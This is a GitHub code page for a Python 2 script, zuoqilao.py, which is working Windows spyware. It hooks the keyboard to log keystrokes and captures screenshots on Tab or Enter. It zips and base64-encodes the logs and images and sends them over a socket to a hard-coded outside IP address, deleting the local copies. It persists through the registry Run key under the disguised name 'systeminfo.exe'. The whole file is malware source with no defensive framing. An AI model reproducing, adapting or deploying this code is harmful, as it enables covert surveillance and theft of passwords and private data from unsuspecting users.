-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathzuoqilao.py
110 lines (110 loc) · 3.09 KB
/
zuoqilao.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
# -*-coding:utf8 -*-
import pyHook
import pythoncom
import time
import socket
from PIL import ImageGrab
import os,sys
import win32api, win32con
import os
import zipfile
import codecs
import base64
import shutil
gg=0
class AutoTask(object):
def __init__(self, path):
self.path = path
def work(self):
runpath = 'Software\Microsoft\Windows\CurrentVersion\Run'
hKey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, runpath, 0, win32con.KEY_SET_VALUE)
path = os.path.abspath(self.path)
if False == os.path.isfile(path):
print 'no'
return False
(filepath, filename) = os.path.split(path)
win32api.RegSetValueEx(hKey, filename, 0, win32con.REG_SZ, path)
win32api.RegCloseKey(hKey)
print 'OK!'
return True
def write_msg_to_txt(msg):
f=open(name,'a')
f.write(msg+'\r\n')
f.close()
def walk_dir(dir,filelist,extName,extName1,topdown=True): #获取目录下的jpg&txt
for root,dirs,files in os.walk(dir,topdown):
for name in files:
if (os.path.splitext(os.path.join(root,name)))[-1]==extName or extName1:
filelist.append(os.path.join(root,name))
for name in dirs:
if (os.path.splitext(os.path.join(root,name)))[-1]==extName or extName1:
fileslist.append(os.path.join(root,name))
def onKeyboardEvent(event):
global MSG
if (127>=event.Ascii>31) or (event.Ascii==8):
MSG+=chr(event.Ascii)
if (event.Ascii==9) or (event.Ascii==13): #Tab键9和回车键13
write_msg_to_txt(MSG)
MSG=''
pic_name=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic=ImageGrab.grab()
pic.save('C:\Windows\jietu\%s.jpg' %pic_name)
global gg
gg=gg+1
print gg
if (gg>=10):
target=('115.29.79.37',6666)
buf_size=6553533
dicName="C:\Windows\jietu"
extName='.jpg'
extName1='.txt'
filelist=[]
walk_dir(dicName,filelist,extName,extName1)
cs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
cs.connect(target)
print cs.recv(buf_size)
zfile=zipfile.ZipFile('in.zip','w',zipfile.ZIP_DEFLATED)
for f in filelist:
zfile.write(f)
os.remove(f)
zfile.close()
#base 2进制 加密 encode(infile,outfile)
infile=open('in.zip','rb')
tmpfile=open('in.tmp','wb')
base64.encode(infile,tmpfile)
infile.close()
tmpfile.close()
tmpfile=open('in.tmp','rb')
cs.send(tmpfile.read())
tmpfile.close()
#后续处理 删除中间文件
os.remove('in.tmp')
cs.close()
gg=0
return True
if __name__ =="__main__":
hh='C:\\Windows\\jietu\\systeminfo1.exe'
if os.path.isfile('C:\Windows\jietu\systeminfo.exe'):
print"N"
else:
shutil.copy('systeminfo.exe','C:\Windows\jietu')
pp=os.listdir("C:\\Windows\\jietu")
if "systeminfo.exe" in pp:
os.rename("C:\\Windows\\jietu\\systeminfo.exe","C:\\Windows\\jietu\\systeminfo1.exe")
os.system("start %s"%hh)
ll=AutoTask(hh)
ll.work()
print "Y"
name='C:\Windows\jietu\monitor.txt'
path=os.getcwd()
path+='\systeminfo.exe'
print path
k=AutoTask(path)
k.work()
if not os.path.exists('C:\Windows\jietu'):
os.mkdir('C:\Windows\jietu')
MSG=''
hk=pyHook.HookManager()
hk.KeyDown=onKeyboardEvent
hk.HookKeyboard()
pythoncom.PumpMessages()